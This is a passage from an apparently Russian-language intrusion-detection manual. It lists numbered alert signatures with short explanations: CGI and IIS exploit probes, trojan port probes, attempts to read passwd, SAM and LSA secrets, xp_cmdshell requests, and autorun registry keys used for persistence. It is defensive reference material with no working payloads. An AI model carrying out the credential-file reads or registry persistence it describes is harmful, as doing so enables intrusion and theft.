CGI win-c-sample.exe.

2002537

CGI wwwboard.pl.

2002538

CGI uploader.exe.

2002539

CGI mlog.html.

2002540

CGI mylog.html.

2002541

CGI snork.bat.

2002542

CGI newdsn.exe.

2002543

FrontPage service.pwd.

2002544

.bash_history URL.

2002545

.url URL type.

2002546

.lnk URL type.

2002547

WebStore admin URL.

2002548

Shopping cart order URL.

2002549

Order Form V1.2 data URL.

2002550

Order Form data URL.

2002551

EZMall data URL.

2002552

QuikStore configuration URL.

2002553

SoftCart password URL.

2002554

Cold Fusion Sample URL.

2002555

favicon.ico bad format.

2002556

Site Server sample URL.

2002557

IIS sample URL.

2002558

IIS password change.

2002559

IIS malformed .HTR request.

2002560

IIS data service query.

2002561

.htaccess URL.

2002562

passwd.txt URL.

2002563

NT system backup URL.

2002564

CGI imagemap.exe.

2002565

adpassword.txt URL.

2002566

CGI whois suspicious field.

2002567

Cold Fusion cache URL.

2002568

IIS malformed HTW request.

2002569

CGI finger.cgi.

2002570

WebSpeed admin URL.

2002571

UBB suspicious posting.

2002572

SubSeven ICQ pager URL.

2002573

Oracle batch file URL.

2002574

sojourn.cgi argument contains %20.

2002575

Index Server null.htw exploit.

2002576

FrontPage extension backdoor URL. Прислан "подозрительный" URL. Библиотека dvwssr.dll, встроенная в расширения FrontPage 98 для IIS, включает в себя ключ шифрования "Netscape engineers are weenies!". Этот ключ может быть использован для маскирования имени запрошенного файла, который затем передается в качестве аргумента в dvwssr.dll URL. Любой, кто имеет привилегии доступа к web-серверу ЭВМ мишени может загрузить любую Web-страницу, включая файлы текстов программ ASP. Используя файл dvwsrr.dll можно также переполнить буфер. Успешная атака может позволить исполнение на сервере удаленной программы.

2002577

FrontPage htimage.exe URL.

2002578

InfoSearch CGI exploit.

2002579

Cart32 Clientlist URL.

2002580

Cart32 ChangeAdminPassword URL.

2002581

Listserv CGI exploit.

2002582

Calendar CGI exploit. Подозрительный URL. Конфигурационный параметр содержит мета-символы, которые вероятно означают, что атакер пытается использовать слабости в некоторых версиях CGI-скрипта. В случае успеха, он сможет выполнить произвольную команду на сервере.

2002583

Rockliffe CGI exploit.

2002584

RealServer Denial-of-service URL.

2002585

Java Admin Servlet backdoor URL. Административный модуль Java Web Server допускает компиляцию и исполнение программы Java server с помощью специального URL. Если атакеру удалось загрузить свой собственный Java-код на сервере, он может тогда скомпилировать и исполнить этот код и получить контроль над серверной системой.

2002586

DOS DoS URL.

2002587

Auction Weaver CGI exploit.

2002589

CGI jj exploit.

2002590

classifieds.cgi.

2002591

BNBSurvey survey.cgi.

2002592

YaBB exploit.

2002593

Webplus CGI exploit.

2002594

Squid cachemgr.cgi.

2002595

IIS system32 command.

2002596

Webevent admin.

2002597

Unify UploadServlet.

2002598

Thinking Arts directory traversal.

2002599

Lotus Domino directory traversal.

2002600

Commerce.cgi directory traversal.

2002601

CGI mailnews suspicious field.

2002602

FrontPage Publishing DoS.

2002603

way-board cgi file access.

2002604

roads cgi file access.

2002605

Hack-a-tack ICQ pager URL.

2002606

Bionet ICQ pager URL.

2002607

IIS .printer overflow.

2002608

ISAPI index extension overflow.

2002609

Y3K ICQ pager URL.

2002610

HTTP Pfdisplay Execute.

2002611

HTTP Pfdisplay Read.

2002701

SMB passwd file.

2002702

SMB sam file.

2002703

SMB winreg file.

2002704

SMB pwl file type.

2002705

SMB win.ini file.

2002706

Startup file access.

2002707

SMB autoexec.bat file access.

2002710

SMB RICHED20.DLL access.

2002801

MS rpc dump. Атакер пытается сканировать вашу систему для услуг RPC/DCOM. Возможно он ищет слабости в системе доступа. Была попытка загрузки списка всех услуг RCP/DCOM. Это специальная команда, которая может быть послана к "RPC End-Point Mapper" работающему с port 135. Эта атака не направлена непосредственно на вторжение. Она является частью (разведывательного этапа) reconnaissance атаки. Команда 'epdump' попросит ЭВМ Windows перечислить все работающие сервисы. Хакер, получив эти данные, сможет эффективнее искать слабые места в вашей обороне. Если хакер найдет какие-то их этих услуг, он вероятно попытается воспользоваться ими. Например, существуют пути, посредством которых спамер может направить e-mail через Microsoft Exchange Servers. Путем выполнения 'epdump', спамер может выяснить, работает ли машина в качестве сервера. Если это так, спамер может затем заставить систему переадресовать SPAM своим "клиентам". Зафильтруйте порт 135 в firewall, как для UDP так и TCP.

2002802

MS share dump.

2002803

MS domain dump.

2002804

MS name lookup.

2002805

MS security ID lookup.

2002806

Malformed LSA request.

2002807

RFPoison attack.

2002808

LsaLookup Denial of Service.

2002901

PPTP malformed.

2002902

IGMP fragments.

2002903

SNTP malformed.

2002904

XDMCP gdm exploit.

2002905

VNC no authentication.

2002906

VCF attachment overflow.

2002907

SNTP overflow.

2002908

Quake Exploit.

2002911

RADIUS User Overflow.

2002912

RADIUS Pass Overflow.

2003001

HTTP port probe.

2003002

POP3 port probe.

2003003

SMTP port probe.

2003004

FTP port probe.

2003005

IMAP4 port probe.

2003006

TELNET port probe.

2003007

FINGER port probe.

2003008

RLOGIN port probe.

2003009

NetBIOS port probe.

2003010

NNTP port probe.

2003011

DNS TCP port robe.

2003012

PCANYWHERE port probe.

2003013

SQL port probe.

2003014

MSRPC TCP port probe.

2003015

XWINDOW port probe. Возможно хакер просканировал вашу систему, чтобы проверить, доступно ли XWINDOWS. Иногда это делается в ходе подготовки будущей атаки, или иногда это делается с целью выяснения, уязвима ли ваша система.

2003016

RPC TCP port probe.

2003017

SOCKS port probe. Кто-то сканирует вашу систему, чтобы проверить, не работает ли там SOCKS. Это означает, что хакер хочет устроить переадресацию трафика через вашу систему на какой-то другой сетевой объект. Это может быть также chat-сервер, который пытается определить, не пробует ли кто-то использовать вашу систему для переадресации. SOCKS представляет собой систему, которая позволяет нескольким машинам работать через общее Интернет соединение. Многие приложения поддерживают SOCKS. Типичным продуктом является WinGate. WinGate инсталлируется на ЭВМ, которая имеет реальное Интернет соединение. Все другие машины в пределах данной области подключаются к Интернет через эту ЭВМ. Проблема с SOCKS и продуктами типа WinGate заключается в том, что они не делают различия между отправителем и получателем, что облегчает удаленным машинам из Интернет получить доступ к внутренним ЭВМ. Что важно, это может позволить хакеру получить доступ к другим машинам через вашу систему. При этом хакер маскирует свое истинное положение в сети. Атака против жертвы выглядит так, как если бы она была предпринята со стороны вашей машины. Этот вид атаки на первом этапе выглядит как сканирование. При использовании SOCKs систему следует конфигурировать так, чтобы заблокировать посторонний доступ. Хакер рассчитывает на вашу ошибку при конфигурации.

2003018

PPTP port probe.

2003019

IRC port probe.

2003020

IDENT port probe.

2003021

Linux conf port probe.

2003022

LPR port probe.

2003101

TCP trojan horse probe.

2003102

TCP port probe. Кто-то пытался получить доступ к вашей машине, но не смог. Это довольно распространенный вид атаки. Типовой хакер сканирует миллионы ЭВМ, не обольщайтесь вы не являетесь главным объектом интересов хакеров, но и расслабляться пожалуй не следует.

2003103

Netbus probe. Кто-то попрововал получить доступ к вашей ЭВМ с помощью "NetBus Trojan Horse" и потерпел неудачу. Хакер ищет ЭВМ, скомпрометированную посредством этой программы. Раз вы не скомпрометированы, хакер потерпел неудачу. Программа Trojan рассылается клиентам в надежде, что какой-то легкомысленный человек ее запустит. Задача такой программы похитить пароль, установить вирус, или переформатировать ваш диск. Специальную популярную группу образуют троянские кони, обеспечивающие удаленный доступ к вашей машине. Такие программы хакер пытается прислать по почте, через chat или новости, при этом хакер может не знать, где в Интернет находится ваша ЭВМ (он не знает, кто читает новости, да и по почте он рассылает эту гадость по тысячам адресов). Хакер знает только, кто является вашим провайдером, и вынужден сканировать всех клиентов данного ISP. При таком сканировании хакера устроит ситуация, когда вы получили данного троянского коня от другого атакера.

2003104

Proxy port probe. Атакер сканирует вашу систему с целью обнаружения прокси-сервера. Затем атакер может воспользоваться вашим прокси-сервером для анонимного просмотра Internet. В настоящее время сканирование TCP-портов 3128,8000 или 8080 рассматривается как обращение к прокси.

2003105

SubSeven port probe.

2003106

T0rn port probe.

2003201

SECURITY/SAM reg hack. Была предпринята попытка доступа к ключу registry под HKLM/SECURITY/SAM. Под этим ключом зарегистрированы имена и пароли пользователей. Хотя пароли зашифрованы, они могут быть проанализированы off-line и выяснены путем грубого перебора.

2003202

RUN reg hack. Была предпринята попытка записи в ключи registry, которые управляют программой при загрузке системы или когда в систему входит новый пользователь. Такими ключами являются

HKLM/SOFTWARE/Microsoft/Windows/CurrentVersion/Run

HKLM/SOFTWARE/Microsoft/Windows/CurrentVersion/RunOnce

HKLM/SOFTWARE/Microsoft/Windows/CurrentVersion/RunOnceEx

HKLM/SOFTWARE/Microsoft/Windows/CurrentVersion/RunServices

HKLM/SOFTWARE/Microsoft/Windows/CurrentVersion/RunServicesOnce

HKLM/SOFTWARE/Microsoft/Windows/CurrentVersion/RunServicesEx

Если имела места попытка записи в один из этих ключей, это может быть попыткой продвинуть Trojan Horse.

2003203

RDS reg hack. Была предпринята серьезная попытка скомпрометировать систему или легальная сетевая платформа осуществляет удаленное конфигурирование системы. Осуществлена попытка удаленной записи ключей registry

HKLM\SOFTWARE\Microsoft\DataFactory\HandlerInfo или

HKLM\SOFTWARE\Microsoft\Jet\3.5\Engines\SandboxMode.

Эти ключи ограничивают удаленный доступ к определенным базам данных в системе Windows. Атакер может попытаться установить свои значения для этих объектов registry, так что неавторизованный удаленный доступ может быть осуществлен позднее через точку уязвимости RDO exploit. По умолчанию, эти ключи могут быть переписаны кем угодно. Разрешения должны быть изменены так, что только администратор мог их менять.

2003204

Index Server reg hack. Была предпринята попытка удаленного доступа к записям Index Server's registry. Сделана попытка доступа к ключу registry Remove remote access в HKLM\SYSTEM\CurrentControlSet\Control\SecurePipeServers\Winreg\AllowedPaths

2003205

NT RASMAN Privilege Escalation attempt. Была предпринята попытка удаленного доступа к троянскому коню RAS manager. Сделана попытка доступа к ключу registry HKLM\SYSTEM\CurrentControlSet\Services\RASMan, который удаленно изменяет программу путем изменения сервера, при следующем запуске ЭВМ, будет исполнена специфицированная программа.

2003206

LSA Secrets attempt. Была предпринята попытка удаленного доступа к "Local System Authority" через вызов registry. Атакер получает удаленный доступ к информации о секретных пароля хremotely. Эти пароли хранятся в зашифрованном виде в registry.

2003207

AeDebug reg hack.

2003208

IMail privilege escalation attempt.

2003209

SQL Exec Passwd. Была предпринята попытка сканирования записей SQLExecutive registry. Происходит подозрительное чтение записей registry из SQL-сервера. Иногда пароли записываются в registry, что делает систему уязвимой.

2003301

AOL Instant Messenger overflow.

2003302

AOL w00w00 attack.

2003401

SNMP port probe.

2003402

RPC UDP port probe.

2003403

NFS port probe.

2003404

TFTP port probe.

2003405

MSRPC UDP port probe.

2003406

UDP ECHO port probe.

2003407

CHARGEN port probe.

2003408

QOTD port probe.

2003409

DNS UDP port probe.

2003410

MSDNS port probe.

2003411

NFS-LOCKD port probe.

2003412

Norton Antivirus port probe.

2003501

UDP Trojan Horse probe.

2003502

UDP port probe.

2003601

FTP passwd file.

2003602

FTP sam file.

2003604

FTP pwl file type.

2003605

FTP win.ini file.

2003606

FTP Host File.

2003701

TFTP passwd file.

2003702

TFTP sam file.

2003704

TFTP pwl file type.

2003705

TFTP win.ini file.

2003706

TFTP Host File.

2003707

TFTP Alcatel files.

2003801

HTTP GET passwd file. Была предпринята подозрительная попытка доступа к файлу. Сделана попытка доступа к файлу passwd, который содержит зашифрованные Unix-пароли. Атакер может после этого использовать общедоступные программные средства для вскрытия паролей, содержащихся в этом файле.

2003802

HTTP GET sam file.

2003804

HTTP GET pwl file type.

2003806

HTTP GET AltaVista password.

2003901

HTTP POST passwd file.

2003902

HTTP POST sam file.

2003904

HTTP POST pwl file type.

2003905

HTTP POST win.ini file. Была предпринята попытка удаленного доступа к системному файлу WIN.INI посредством Web-формы. Эта попытка может быть сопряжена с намерением реконфигурировать систему, чтобы реконфигурированная система при последующем запуске загрузила троянского коня.

2004001

SOCKS connect. Кто-то подключился через вашу систему, используя протокол SOCKS. Это может быть хакер, который хочет переадресовать трафик через вашу систему на другие ЭВМ, а также сервер chat, пытающийся определить, не пробует ли кто-то проскочить через вашу систему чтобы работать анонимно на "халяву". SOCKS представляет собой систему, которая позволяет нескольким машинам работать через общее Интернет соединение. Многие приложения поддерживают SOCKS. Типичным продуктом является WinGate. WinGate инсталлируется на ЭВМ, которая имеет реальное Интернет соединение. Все другие машины в пределах данной области подключаются к Интернет через эту ЭВМ. Проблема с SOCKS и продуктами типа WinGate заключается в том, что они не делают различия между отправителем и получателем, что облегчает удаленным машинам из Интернет получить доступ ко внутренним ЭВМ. Что важно, это может позволить хакеру получить доступ к другим машинам через вашу систему. При этом хакер маскирует свое истинное положение в сети. Атака против жертвы выглядит так, как если бы она была предпринята со стороны вашей машины. Этот вид атаки на первом этапе выглядит как сканирование. При использовании SOCKs систему следует конфигурировать так, чтобы заблокировать посторонний доступ. Хакер рассчитывает на вашу ошибку при конфигурации. Ваша внутренняя сеть должна использовать IP-адреса, которые никогда не появляются в Internet. Такими адресами обычно являются "192.168.x.x", "172.16.x.x" или "10.x.x.x".

2004002

SOCKS over SOCKS. Кто-то подключился через вашу систему, используя протокол SOCKS. то может быть хакер, который хочет переадресовать трафик через вашу систему на другие ЭВМ. В этом случае, трафик оказывается инкапсулированным в SOCKS, это означает, что атакер вероятно намерен использовать вашу систему для переадресации к другой системе SOCKS. SOCKS представляет собой систему, которая позволяет нескольким машинам работать через общее Интернет соединение. Многие приложения поддерживают SOCKS. Типичным продуктом является WinGate. WinGate инсталлируется на ЭВМ, которая имеет реальное Интернет соединение. Все другие машины в пределах данной области подключаются к Интернет через эту ЭВМ. Проблема с SOCKS и продуктами типа WinGate заключается в том, что они не делают различия между отправителем и получателем, что облегчает удаленным машинам из Интернет получить доступ ко внутренним ЭВМ. Что важно, это может позволить хакеру получить доступ к другим машинам через вашу систему. При этом хакер маскирует свое истинное положение в сети. Атака против жертвы выглядит так, как если бы она была предпринята со стороны вашей машины.

2004101

Java contains Brown Orifice attack.

2004201

HTTP Cross site scripting.

2004301

DHCP Domain Metachar.

2004302

BOOTP File Overflow.

2004303

UPNP NOTIFY overflow.

2004401

SubSeven email.

2004402

Bionet email. Программа троянского коня Bionet имеет возможность посылать оповещения через e-mail, когда система, содержащая троянского коня, загружается. Это позволяет хакеру знать, что Bionet работает, и ваша система может быть компрометирована хакером. Судя по всему ваша система скомпрометирована. Вам следует использовать антивирусную программу, чтобы немедленно удалить троянского коня Bionet из вашей системы.

2004403

Y3K email.

2004501

HTTP GET contains xp_cmdshell. В качестве аргумента URL обнаружена строка xp_cmdshell; это обычно указывает, что предпринята попытка исполнить команду shell для атакера исполнять на сервере команды shell.

2004502

HTTP POST contains xp_cmdshell. В данных, передаваемых Web-сайту, обнаружена строка xp_cmdshell. Это обычно указывает, что предпринята попытка выполнить команду shell на SQL-сервере. Если SQL-сервер некорректно сконфигурирован, имеется возможность для атакера выполнять на сервере команды shell.

2004601

Code Red I.

2004602

Code Red II.

2004603

Code Red II+.

2009100

DNS crack successful.

2009201

ISS Scan.

2009202

CyberCop Scan.

2009203

Nessus Scan.

2009204

Satan Scan.

2009205

Saint Scan.

2009206

Cerebus Scan.

2009207

Retina Scan.

2010000-2010999

User-specified filename.

2011000-2011999

User-specified URL.

2012000-2012999

User-specified email recipient.

2013000-2013999

User-specified email pattern.

2014000-2014999

User-specified MIME-attached filename.

2015000-2015999

User-specified TCP probe port.

2016000-2016999

User-specified UDP probe port.

2017000-2017999

User-specified registry key.

2018000-2018999

User-specified TCP trojan response.

2019000-2019999

User-specified IRC channel name.

2020000-2020999

User-specified Java pattern.

2900001

Application Terminated.

2900002

Application Added.

2900003

Application Communication Blocked.

Config

Configuration parameters.





Содержание  Назад  Вперед